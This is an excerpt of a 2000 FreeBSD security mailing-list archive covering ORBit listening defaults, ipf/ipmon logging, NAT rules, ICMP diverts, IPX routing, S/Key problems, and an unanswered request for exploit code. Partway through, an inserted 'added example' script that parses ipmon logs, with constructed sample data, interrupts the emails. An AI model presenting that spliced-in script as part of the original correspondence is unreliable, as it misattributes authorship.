        echo "ORBIIOPIPv6=0" >> ${PREFIX}/etc/orbitrc
    fi

I want it secured by default. As you say, if a better solution shows up later, so be it. I doubt anyone outside of the GNOME or ORBit development communities has an orbitrc anyway.

--
Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org

From owner-freebsd-security Thu Sep 14 17:19:52 2000 Delivered-To: freebsd-security@freebsd.org Received: from imapserver1.fnal.gov (imapserver1.fnal.gov [131.225.9.6]) by hub.freebsd.org (Postfix) with ESMTP id 31FE237B424 for ; Thu, 14 Sep 2000 17:19:49 -0700 (PDT) Received: from SMTP ([131.225.9.6]) by imapserver1.fnal.gov (Netscape Messaging Server 3.62) with SMTP id 1095 for ; Thu, 14 Sep 2000 19:19:48 -0500 Received: from nova.fnal.gov ([131.225.18.207]) by 131.225.9.6 (Norton AntiVirus for Internet Email Gateways 1.0) ; Fri, 15 Sep 2000 00:19:47 0000 (GMT) Received: from localhost (tez@localhost) by nova.fnal.gov (8.9.3+Sun/8.9.1) with ESMTP id TAA26891 for ; Thu, 14 Sep 2000 19:19:45 -0500 (CDT) X-Authentication-Warning: nova.fnal.gov: tez owned process doing -bs Date: Thu, 14 Sep 2000 19:19:45 -0500 (CDT)
From: Tim Zingelman
X-Sender: tez@nova.fnal.gov
To: security@FreeBSD.ORG
Subject: Re: potential security exposure in GNOME/ORBit?
In-Reply-To: <20000914191330.A817@spawn.nectar.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> However, I think that is mostly useless. I'd rather see this:
> if [ ! -f ${PREFIX}/etc/orbitrc ]; then
> echo "ORBIIOPIPv4=0" > ${PREFIX}/etc/orbitrc
> echo "ORBIIOPIPv6=0" >> ${PREFIX}/etc/orbitrc
> fi
> I want it secured by default. As you say, if a better solution shows up
> later, so be it.
> Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org

How about:

    echo "ORBIIOPIPv4=0" >> ${PREFIX}/etc/orbitrc
    echo "ORBIIOPIPv6=0" >> ${PREFIX}/etc/orbitrc

Am I crazy or doesn't >> work just fine even if the file does not exist?

- Tim

From owner-freebsd-security Thu Sep 14 17:25:27 2000 Delivered-To: freebsd-security@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id C9CB537B43F for ; Thu, 14 Sep 2000 17:25:19 -0700 (PDT) Received: by jade.chc-chimes.com (Postfix, from userid 1001) id 4D8861C6F; Thu, 14 Sep 2000 20:25:19 -0400 (EDT) Date: Thu, 14 Sep 2000 20:25:19 -0400
From: Bill Fumerola
To: Tim Zingelman
Cc: security@FreeBSD.ORG
Subject: Re: potential security exposure in GNOME/ORBit?
Message-ID: <20000914202519.K47559@jade.chc-chimes.com>
References: <20000914191330.A817@spawn.nectar.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0i
In-Reply-To: ; from zingelman@fnal.gov on Thu, Sep 14, 2000 at 07:19:45PM -0500
X-Operating-System: FreeBSD 3.3-STABLE i386
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, Sep 14, 2000 at 07:19:45PM -0500, Tim Zingelman wrote:
> How about:
>
> echo "ORBIIOPIPv4=0" >> ${PREFIX}/etc/orbitrc
> echo "ORBIIOPIPv6=0" >> ${PREFIX}/etc/orbitrc
>
> Am I crazy or doesn't >> work just fine even if the file does not exist?

What if it already exists, and ORBIIOPIPv4 is already set to something?
That's why we check to see if it doesn't exist already.

--
Bill Fumerola - Network Architect, BOFH / Chimes, Inc.
billf@chimesnet.com / billf@FreeBSD.org

From owner-freebsd-security Thu Sep 14 18:21:52 2000
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id F3FD637B423; Thu, 14 Sep 2000 18:21:50 -0700 (PDT)
Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id SAA51401; Thu, 14 Sep 2000 18:21:50 -0700 (PDT) (envelope-from kris@FreeBSD.org)
X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs
Date: Thu, 14 Sep 2000 18:21:50 -0700 (PDT)
From: Kris Kennaway
To: Ade Lovett
Cc: "Louis A. Mamakos" , security@freebsd.org
Subject: Re: potential security exposure in GNOME/ORBit?
In-Reply-To: <20000914122320.G73990@FreeBSD.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 14 Sep 2000, Ade Lovett wrote:

> The problem here is that it's not the binary itself that is
> configured to listen on the network (indeed, the defaults for
> ipv4 and ipv6 are 0 in the ORBit code itself).

Okay, then I can't think of a better solution.

Kris

--
In God we Trust -- all others must submit an X.509 certificate.
    -- Charles Forsythe

From owner-freebsd-security Thu Sep 14 19:14:56 2000
Delivered-To: freebsd-security@freebsd.org
Received: from whizzo.transsys.com (whizzo.TransSys.COM [144.202.42.10]) by hub.freebsd.org (Postfix) with ESMTP id 10E8F37B42C; Thu, 14 Sep 2000 19:14:54 -0700 (PDT)
Received: from whizzo.transsys.com (localhost.transsys.com [127.0.0.1]) by whizzo.transsys.com (8.11.0/8.11.0) with ESMTP id e8F2ErH10738; Thu, 14 Sep 2000 22:14:53 -0400 (EDT) (envelope-from louie@whizzo.transsys.com)
Message-Id: <200009150214.e8F2ErH10738@whizzo.transsys.com>
X-Mailer: exmh version 2.1.1 10/15/1999
To: Ade Lovett
Cc: Kris Kennaway , security@FreeBSD.org
X-Image-URL: http://www.transsys.com/louie/images/louie-mail.jpg
From: "Louis A. Mamakos"
Subject: Re: potential security exposure in GNOME/ORBit?
References: <200009140243.e8E2hDG42233@whizzo.transsys.com> <20000914085620.K61662@FreeBSD.org>
In-reply-to: Your message of "Thu, 14 Sep 2000 08:56:20 CDT." <20000914085620.K61662@FreeBSD.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Thu, 14 Sep 2000 22:14:53 -0400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Thanks very much. I've been running with the TCP transport turned off
for a couple of days without any problems. Though I suppose I have a
rather mundane configuration here..

louie

> On Wed, Sep 13, 2000 at 10:05:40PM -0700, Kris Kennaway wrote:
> > Unless anyone can think of compelling reasons to have network listening
> > enabled, I'd prefer to have it disabled by default.
>
> I'll kill it off later on this week. Since I have an awful lot of
> GNOME applications running on this box (some from ports, some just
> waiting to be ported), I should be able to pick up on any other
> problems fairly quickly.
>
> I also have a tentative fix for the locale problem that was highlighted
> elsewhere (on -stable I believe).
>
> > GNOME scares me :-)
>
> Me too. Does that scare you any more? :)
>
> -aDe [Mr FreeBSD GNOME]
>
> --
> Ade Lovett, Austin, TX.
> ade@FreeBSD.org
> FreeBSD: The Power to Serve http://www.FreeBSD.org/

From owner-freebsd-security Thu Sep 14 19:15:52 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id 7D09D37B43C for ; Thu, 14 Sep 2000 19:15:49 -0700 (PDT)
Received: (qmail 23276 invoked by uid 0); 15 Sep 2000 02:15:48 -0000
Received: from p3ee20a9d.dip.t-dialin.net (HELO speedy.gsinet) (62.226.10.157) by mail.gmx.net with SMTP; 15 Sep 2000 02:15:48 -0000
Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id UAA26687 for freebsd-security@FreeBSD.ORG; Thu, 14 Sep 2000 20:30:48 +0200
Date: Thu, 14 Sep 2000 20:30:48 +0200
From: Gerhard Sittig
To: "freebsd-security@FreeBSD.ORG"
Subject: Re: ipf logging
Message-ID: <20000914203048.I22846@speedy.gsinet>
Mail-Followup-To: "freebsd-security@FreeBSD.ORG"
References: <39BF49B9.F5EAFC19@allmaui.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0i
In-Reply-To: ; from fgleiser@cactus.fi.uba.ar on Wed, Sep 13, 2000 at 02:17:05PM -0300
Organization: System Defenestrators Inc.
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, Sep 13, 2000 at 14:17 -0300, Fernando Gleiser wrote:
>
> On Wed, 13 Sep 2000, Craig Cowen wrote:
>
> > I am not clear on how to log ipf.
> > I believe I need to edit my syslog.conf.
>
> Yes and no. ipmon (ipf's logging process) can log via syslog or
> directly to a file.
>
> If you want to log to a file:
> # ipmon &

Don't forget to edit in the /etc/newsyslog.conf entry for this case
like this one:

/var/log/ipflog 600 10 100 * Z /var/run/ipmon.pid

> If you want to use syslog:
> # ipmon -s &
>
> and you have to add a line like this to syslog.conf:
> local0.* /var/log/ipf.log

shameless plug:

See http://www.freebsd.org/cgi/query-pr.cgi?pr=20202 for a way to
employ ipf in FreeBSD 4 and above. Although the newsyslog.conf
thingy is not in there.

virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76
Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net
--
If you don't understand or are scared by any of the above
ask your parents or an adult to help you.
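Once ipmon writes to a file as described above, the log is only useful if something reads it. The following POSIX shell script is an added example, not code from Gerhard Sittig's or Fernando Gleiser's messages: it summarises ipmon file-log lines, counting blocked packets per destination and flagging passed inbound SYNs that recur from the same client source port, which is what a connection that ipf lets in but that never gets an answer looks like. The sample lines are constructed for the example and follow the ipmon layout shown in Buliwyf McGraw's message later in this digest; the /var/log/ipflog path is the one from the newsyslog.conf entry above.

```shell
#!/bin/sh
# Added example: summarise ipmon file-log lines. The sample lines below are
# constructed, not taken from a real firewall. Field layout (awk $1..$15):
#   date time iface @group:rule action src,sport -> dst,dport PR proto len <hlen> <len> flags dir
IPMON_SAMPLE='15/09/2000 11:07:16.303473 sis0 @0:1 p 192.168.40.15,38287 -> 192.168.40.2,23 PR tcp len 20 11264 -S IN
15/09/2000 11:07:19.310001 sis0 @0:1 p 192.168.40.15,38287 -> 192.168.40.2,23 PR tcp len 20 11264 -S IN
15/09/2000 11:07:25.320002 sis0 @0:1 p 192.168.40.15,38287 -> 192.168.40.2,23 PR tcp len 20 11264 -S IN
15/09/2000 11:08:02.000001 sis0 @0:6 b 10.9.8.7,4444 -> 200.25.53.10,22 PR tcp len 20 60 -S IN
15/09/2000 11:08:05.000002 sis0 @0:6 b 10.9.8.7,4445 -> 200.25.53.10,22 PR tcp len 20 60 -S IN
15/09/2000 11:08:09.000003 sis0 @0:6 b 10.9.8.7,4446 -> 200.25.53.10,23 PR tcp len 20 60 -S IN
15/09/2000 11:08:11.000004 sis0 @0:2 p 192.168.40.15,38290 -> 200.25.53.10,8080 PR tcp len 20 60 -S IN'

# Blocked packets per destination "ip,port", most frequent first.
# Usage on a live box: ipmon_blocked_by_dst "$(cat /var/log/ipflog)"
ipmon_blocked_by_dst() {
    printf '%s\n' "$1" |
        awk '$5 == "b" { n[$8]++ } END { for (d in n) print n[d], d }' |
        sort -rn
}

# Inbound TCP SYNs that ipf passed ("p") but that show up again with the same
# client source port: the client is retransmitting its SYN because no SYN/ACK
# came back, i.e. the filter let the request in but the reply path is broken.
ipmon_syn_retransmits() {
    printf '%s\n' "$1" |
        awk '$5 == "p" && $10 == "tcp" && $14 == "-S" && $15 == "IN" { n[$6 " -> " $8]++ }
             END { for (k in n) if (n[k] > 1) print n[k], k }' |
        sort -rn
}

# Stand-alone run on the constructed sample.
echo "blocked per destination:"
ipmon_blocked_by_dst "$IPMON_SAMPLE"
echo "passed SYNs that were never answered:"
ipmon_syn_retransmits "$IPMON_SAMPLE"
```

Both functions take the log text as a single argument so they work on a rotated file as well as on the live one; on the sample they report two blocked connections to port 22, one to 23, and a three-fold SYN retransmit from 192.168.40.15 to the alias address.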
From owner-freebsd-security Fri Sep 15 3:16:11 2000
Delivered-To: freebsd-security@freebsd.org
Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id EC75C37B42C for ; Fri, 15 Sep 2000 03:16:08 -0700 (PDT)
Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 13ZsXK-0001bo-00; Fri, 15 Sep 2000 12:16:02 +0200
Date: Fri, 15 Sep 2000 12:16:02 +0200 (IST)
From: Roman Shterenzon
To: Gerhard Sittig
Cc: "freebsd-security@FreeBSD.ORG"
Subject: Re: ipf logging
In-Reply-To: <20000914203048.I22846@speedy.gsinet>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 14 Sep 2000, Gerhard Sittig wrote:

> > and you have to add a line like this to syslog.conf:
> > local0.* /var/log/ipf.log
>
> shameless plug:
>
> See http://www.freebsd.org/cgi/query-pr.cgi?pr=20202 for a way to
> employ ipf in FreeBSD 4 and above. Although the newsyslog.conf
> thingy is not in there.

I was just looking for such a thing a couple of days ago. I was almost
sure that it's committed in FreeBSD 4.1-STABLE, but I didn't find it.
Why isn't that committed yet? I see that the 'last modified' date is 20 Jul.
This patch seems to be a GoodThing(tm).

--Roman Shterenzon, UNIX System Administrator and Consultant
[ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ]

From owner-freebsd-security Fri Sep 15 9:31:16 2000
Delivered-To: freebsd-security@freebsd.org
Received: from libertad.univalle.edu.co (libertad.univalle.edu.co [216.6.69.11]) by hub.freebsd.org (Postfix) with ESMTP id 8815637B424 for ; Fri, 15 Sep 2000 09:31:06 -0700 (PDT)
Received: from localhost (buliwyf@localhost) by libertad.univalle.edu.co (8.10.0/8.10.0) with ESMTP id e8FGbg639242 for ; Fri, 15 Sep 2000 11:37:43 -0500 (COT)
Date: Fri, 15 Sep 2000 11:37:42 -0500 (COT)
From: Buliwyf McGraw
To: freebsd-security@FreeBSD.ORG
Subject: ipf rules
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi... I'm working with ipf on FreeBSD.
I work with just one network interface and I'm using 2 ip addresses (the
second is an alias).

My official ip (example): 200.25.53.10
My alias ip: 192.168.40.2

Now, I'm using this server with nat and proxy to give Internet Access to
all my intranet (192.168.0.0).
Everything is ok... BUT i can do a telnet to my alias ip 192.168.40.2
from my intranet. It might works??? You could think: the rules are wrong!!!
So... here are my rules:

*********************************************************************
My ipf.file:

pass in from any to 192.168.40.2/32
pass in from 192.168.18.40/2 to any
pass out from any to 192.168.40.2/32
pass out from 192.168.18.40/32 to any
pass out from 200.25.53.10/32 to any
pass in from any to 200.25.53.10/32
*********************************************************************
My ipnat.file:

# Redirect everything to squid on port 8080
rdr sis0 0.0.0.0/0 port 80 -> 200.25.53.10 port 8080 tcp
rdr sis0 0.0.0.0/0 port 80 -> 200.25.53.10 port 8080 udp

# Nat for 192
map sis0 192.168.0.0/16 -> 200.25.53.10/32 portmap tcp/udp 1025:65000
map sis0 192.168.0.0/16 -> 200.25.53.10/32
*********************************************************************

I'm using ipmon to see what is going on, and I catch this:

15/09/2000 11:07:16.303473 sis0 @0:1 p 192.168.40.15,38287 -> 192.168.40.2,23 PR tcp len 20 11264 -S IN

When I try a telnet from 192.168.40.15:

telnet 192.168.40.2
Trying 192.168.40.2...
telnet: Unable to connect to remote host: Operation timed out

I mean, the request is going to the server... but the answer never
comes... so???

Thanks for any help.
=======================================================================
Buliwyf McGraw
Administrator of the Libertad Server
Information Services Center
Universidad del Valle
=======================================================================

From owner-freebsd-security Fri Sep 15 9:31:40 2000
Delivered-To: freebsd-security@freebsd.org
Received: from ocis.ocis.net (ocis.ocis.net [209.52.173.1]) by hub.freebsd.org (Postfix) with ESMTP id 61BC137B423 for ; Fri, 15 Sep 2000 09:31:38 -0700 (PDT)
Received: from localhost (vdrifter@localhost) by ocis.ocis.net (8.9.3/8.9.3) with ESMTP id JAA26800 for ; Fri, 15 Sep 2000 09:31:34 -0700
Date: Fri, 15 Sep 2000 09:31:34 -0700 (PDT)
From: John F Cuzzola
To: freebsd-security@FreeBSD.ORG
Subject: icmp + ipfw divert + natd
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hello Everyone,

On my network I have all packets routed through a FreeBSD box and nated
even for public computers. For example I have a webserver with ip 10.0.0.1.
A public ip of say 100.100.100.1 is given as an alias to the firewall box.
Then the following ipfw rules are used:

10 divert 7500 tcp from any to 100.100.100.1 80
20 divert 7500 tcp from 10.0.0.1 80 to any established

(port 7500 will have natd listening to do the translation)

I do the same as above with all services (smtp, pop3, ftp, dns, etc...).
Things seem to be working quite well. My question is with icmp. I have a
divert line like:

30 divert 7500 icmp from any to 100.100.100.1 icmptypes 0,3,4,8,11
40 divert 7500 icmp from 10.0.0.1 to any icmptypes ?????????

My question is rule 40. Which icmp packets should I natd out? I don't care
much for "echo reply" but I don't want to break things like MTU Path
Discovery. Any comments would be appreciated.

Thank-you

From owner-freebsd-security Fri Sep 15 12:15:53 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id 9513937B423 for ; Fri, 15 Sep 2000 12:15:49 -0700 (PDT)
Received: (qmail 9902 invoked by uid 0); 15 Sep 2000 19:15:45 -0000
Received: from p3ee20a99.dip.t-dialin.net (HELO speedy.gsinet) (62.226.10.153) by mail.gmx.net with SMTP; 15 Sep 2000 19:15:45 -0000
Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id UAA28715 for freebsd-security@FreeBSD.ORG; Fri, 15 Sep 2000 20:35:31 +0200
Date: Fri, 15 Sep 2000 20:35:31 +0200
From: Gerhard Sittig
To: "freebsd-security@FreeBSD.ORG"
Subject: Re: ipf logging
Message-ID: <20000915203531.E27034@speedy.gsinet>
Mail-Followup-To: "freebsd-security@FreeBSD.ORG"
References: <20000914203048.I22846@speedy.gsinet>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0i
In-Reply-To: ; from roman@xpert.com on Fri, Sep 15, 2000 at 12:16:02PM +0200
Organization: System Defenestrators Inc.
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, Sep 15, 2000 at 12:16 +0200, Roman Shterenzon wrote:
> On Thu, 14 Sep 2000, Gerhard Sittig wrote:
> >
> > See http://www.freebsd.org/cgi/query-pr.cgi?pr=20202 for a
> > way to employ ipf in FreeBSD 4 and above. [ ... ]
>
> I was just looking for such a thing a couple of days ago. I was
> almost sure that it's committed in FreeBSD 4.1-STABLE, but I
> didn't find it. Why isn't that committed yet?

ipfilter has made its way into FreeBSD's base system. But it's not
plugged in right from the start. The default packet filter is ipfw
and the distro's scripts use this one. Initially I used ipf on
FreeBSD only because I've seen OpenBSD before. But I stood with it
when I was done reading the IPF HowTo. :)

> I see that the 'last modified' date is 20 Jul.
> This patch seems to be a GoodThing(tm).

Yes, but it could have been better right from the start. :) I'm
afraid the split into two sequential diffs made it less readable and
somewhat unappealing. After all it's my first PR. :>

Is it a good idea to follow up with a combined patch to bring the
normal -STABLE to -STABLE with ipf hooks? Is it a bad idea to close
this PR and have it then be replaced (or better worded: handled) by
another one? Is something missing to have it applied? IOW: Am I
required to add something to make it complete and ready for
application?
I'm willing to do whatever it takes -- not to have my name on some
FreeBSD part but to not collide any longer after updating with my
customization against the provided mechanisms.

virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76
Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net
--
If you don't understand or are scared by any of the above
ask your parents or an adult to help you.

From owner-freebsd-security Fri Sep 15 15: 1:49 2000
Delivered-To: freebsd-security@freebsd.org
Received: from telcom.columbia.k12.mo.us (telcom.columbia.k12.mo.us [198.209.97.194]) by hub.freebsd.org (Postfix) with ESMTP id 2909A37B422; Fri, 15 Sep 2000 15:01:43 -0700 (PDT)
Received: (from ishmael@localhost) by telcom.columbia.k12.mo.us (8.9.3/8.9.3) id RAA00359; Fri, 15 Sep 2000 17:01:42 -0500 (CDT) (envelope-from ishmael)
Date: Fri, 15 Sep 2000 17:01:42 -0500
From: Jeremy Norris
To: security@FreeBSD.ORG
Cc: net@FreeBSD.ORG
Subject: ip filtering along side ipx
Message-ID: <20000915170142.B321@telcomm.columbia.k12.mo.us>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.4i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I'm attempting to implement a firewall in a building on our WAN using
ipfilter and 4.1-release. Since we are a Novell shop, it needs to be able to
route all the IPX traffic through untouched. I've read through the manpages
about IPXrouted, and also read through the info at
http://people.freebsd.org/~bp , but I'm not sure how to set it up correctly.
Can I ifconfig both ethernet interfaces with the same network number and enable
IPXrouted (along with ipxgateway enabled) or is it more complex?

Jeremy

PS CC all replies to me, I'm not subscribed to the lists.

From owner-freebsd-security Fri Sep 15 16: 5: 6 2000
Delivered-To: freebsd-security@freebsd.org
Received: from sasami.jurai.net (sasami.jurai.net [63.67.141.99]) by hub.freebsd.org (Postfix) with ESMTP id AAD9D37B424; Fri, 15 Sep 2000 16:05:01 -0700 (PDT)
Received: from localhost (winter@localhost) by sasami.jurai.net (8.9.3/8.8.7) with ESMTP id TAA06616; Fri, 15 Sep 2000 19:04:58 -0400 (EDT)
Date: Fri, 15 Sep 2000 19:04:58 -0400 (EDT)
From: "Matthew N. Dodd"
To: Jeremy Norris
Cc: security@FreeBSD.ORG, net@FreeBSD.ORG
Subject: Re: ip filtering along side ipx
In-Reply-To: <20000915170142.B321@telcomm.columbia.k12.mo.us>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 15 Sep 2000, Jeremy Norris wrote:
> Can I ifconfig both ethernet interfaces with the same network number
> and enable IPXrouted (along with ipxgateway enabled) or is it more
> complex?

I setup my 2 ethernet interfaces with different IPX networks, enabled
ipxgateway and IPXrouted and everything works.

Granted I've only got a single server and performed only a single test
on the remote network, but I don't think you should have any problem.

--
| Matthew N. Dodd              | '78 Datsun 280Z | '75 Volvo 164E | FreeBSD/NetBSD  |
| winter@jurai.net             | 2 x '84 Volvo 245DL              | ix86,sparc,pmax |
| http://www.jurai.net/~winter | This Space For Rent              | ISO8802.5 4ever |

From owner-freebsd-security Fri Sep 15 16:59: 9 2000
Delivered-To: freebsd-security@freebsd.org
Received: from alpha.simphost.com (alpha.simphost.com [216.253.163.10]) by hub.freebsd.org (Postfix) with ESMTP id 1E8EB37B424; Fri, 15 Sep 2000 16:59:02 -0700 (PDT)
Received: by alpha.simphost.com (Postfix, from userid 1000) id D24D343D0B; Fri, 15 Sep 2000 11:02:42 -0600 (MDT)
Received: from localhost (localhost [127.0.0.1]) by alpha.simphost.com (Postfix) with ESMTP id CC8553E006; Fri, 15 Sep 2000 11:02:42 -0600 (MDT)
Date: Fri, 15 Sep 2000 11:02:42 -0600 (MDT)
From: "Jason L. Schwab"
To: freebsd-questions@freebsd.org, freebsd-security@freebsd.org
Subject: S/Key (FBSD-3.5-S)
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hey ;)

I am trying to get the S/Key system to work on my FreeBSD 3.5-STABLE
machine. I read the manpages for keyinit, skey, key, etc. - and I read
the skey.html file on www.freebsd.org, so I have RTFM...

I run "keyinit", it asks for a new pass phrase, I give it one twice, it
generates the key and gives me the key # and etc. just fine.

I telnet to the machine, type in my username, it says s/key () ()... and
I hit enter to make sure I am typing it right, which I am and verified
10 times. No matter what, I get Login Incorrect.

I noticed on OpenBSD systems (2.6) that you had to run "skey on username"
before that user could use skey, even though I already get the s/key
request at the login prompt.

Any ideas would be grateful, Thanks!

Also, is there a way in FreeBSD 3.5-S to make an account only accessible
from certain IP blocks (or hostnames)? thanks again!

- Jason L. Schwab
CEO / Unix System Administrator
Simple Hosting Solutions
www.simphost.com

From owner-freebsd-security Fri Sep 15 17:16:11 2000
Delivered-To: freebsd-security@freebsd.org
Received: from relay.butya.kz (butya-gw.butya.kz [212.154.129.94]) by hub.freebsd.org (Postfix) with ESMTP id DE26F37B422; Fri, 15 Sep 2000 17:16:05 -0700 (PDT)
Received: by relay.butya.kz (Postfix, from userid 1000) id 02AB5287F4; Sat, 16 Sep 2000 07:16:01 +0700 (ALMST)
Received: from localhost (localhost [127.0.0.1]) by relay.butya.kz (Postfix) with ESMTP id E85BE287F3; Sat, 16 Sep 2000 07:16:01 +0700 (ALMST)
Date: Sat, 16 Sep 2000 07:16:01 +0700 (ALMST)
From: Boris Popov
To: Jeremy Norris
Cc: security@FreeBSD.ORG, net@FreeBSD.ORG
Subject: Re: ip filtering along side ipx
In-Reply-To: <20000915170142.B321@telcomm.columbia.k12.mo.us>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 15 Sep 2000, Jeremy Norris wrote:

> I'm attempting to implement a firewall in a building on our WAN using
> ipfilter and 4.1-release. Since we are a Novell shop, it needs to be able to
> route all the IPX traffic through untouched. I've read through the manpages
> about IPXrouted, and also read through the info at
> http://people.freebsd.org/~bp , but I'm not sure how to set it up correctly.
> Can I ifconfig both ethernet interfaces with the same network number and enable
> IPXrouted (along with ipxgateway enabled) or is it more complex?

No, each interface should have its own IPX network number, just like
when you configure a NetWare server with multiple ethernet adapters.
IPX traffic is not affected by IP filtering programs.

--
Boris Popov
http://www.butya.kz/~bp/

From owner-freebsd-security Fri Sep 15 20:24:44 2000
Delivered-To: freebsd-security@freebsd.org
Received: from atlas.cs.ucla.edu (Atlas.CS.UCLA.EDU [131.179.49.73]) by hub.freebsd.org (Postfix) with ESMTP id A68DA37B42C for ; Fri, 15 Sep 2000 20:24:42 -0700 (PDT)
Received: from localhost (yjin@localhost) by atlas.cs.ucla.edu (8.9.3/8.9.3) with ESMTP id UAA00726 for ; Fri, 15 Sep 2000 20:20:34 -0700 (PDT) (envelope-from yjin@cs.ucla.edu)
X-Authentication-Warning: atlas.cs.ucla.edu: yjin owned process doing -bs
Date: Fri, 15 Sep 2000 20:20:34 -0700 (PDT)
From: Jin Yixin
To: freebsd-security@FreeBSD.ORG
Subject: exploit for FreeBSD-SA-00:23
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi,

Does anyone have the exploit code or sample packets to do "remote
denial-of-service in IP stack" described in FreeBSD-SA-00:23?

Thanks a lot

Yixin Jin
UCLA, Computer Science Dept.

From owner-freebsd-security Sat Sep 16 3:38:25 2000
Delivered-To: freebsd-security@freebsd.org
Received: from nets5.rz.rwth-aachen.de (nets5.rz.RWTH-Aachen.DE [137.226.144.13]) by hub.freebsd.org (Postfix) with ESMTP id BE4A037B424; Sat, 16 Sep 2000 03:38:17 -0700 (PDT)
Received: from hyperion.informatik.rwth-aachen.de (hyperion.Informatik.RWTH-Aachen.DE [137.226.112.212]) by nets5.rz.rwth-aachen.de (8.10.1/8.10.1/5) with ESMTP id e8GAcAM28403; Sat, 16 Sep 2000 12:38:10 +0200 (MET DST)
Received: from agamemnon.informatik.rwth-aachen.de (agamemnon.Informatik.RWTH-Aachen.DE [137.226.194.74]) by hyperion.informatik.rwth-aachen.de (8.9.1b+Sun/8.9.1/2) with ESMTP id MAA12251; Sat, 16 Sep 2000 12:38:06 +0200 (MET DST)
Received: (from stolz@localhost) by agamemnon.informatik.rwth-aachen.de (8.9.1b+Sun/8.9.1-gb-2) id MAA12353; Sat, 16 Sep 2000 12:38:08 +0200 (MET DST)
Date: Sat, 16 Sep 2000 12:38:08 +0200
From: Volker Stolz
To: "Jason L. Schwab"
Cc: freebsd-questions@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: S/Key (FBSD-3.5-S)
Message-ID: <20000916123808.B12326@agamemnon.informatik.rwth-aachen.de>
References:
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0i
In-Reply-To: ; from jlschwab@simphost.com on Fri, Sep 15, 2000 at 11:02:42AM -0600
Organization: Chair for CS II 1/2 "Dysfunctional Programming"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, Sep 15, 2000 at 11:02:42AM -0600, Jason L. Schwab wrote:
> I telnet to the machine, type in my username
> it says s/key () ()... and I hit enter to
> make sure I am typing it right, and which
> I am and verified 10 times. No matter
> what, I get Login Incorrect.

Your description is too vague for my taste, please elaborate, or, even
better, quote an entire sample session.

> Also, Is there a way in FreeBSD 3.5-S, to
> make an account only accessible from certain
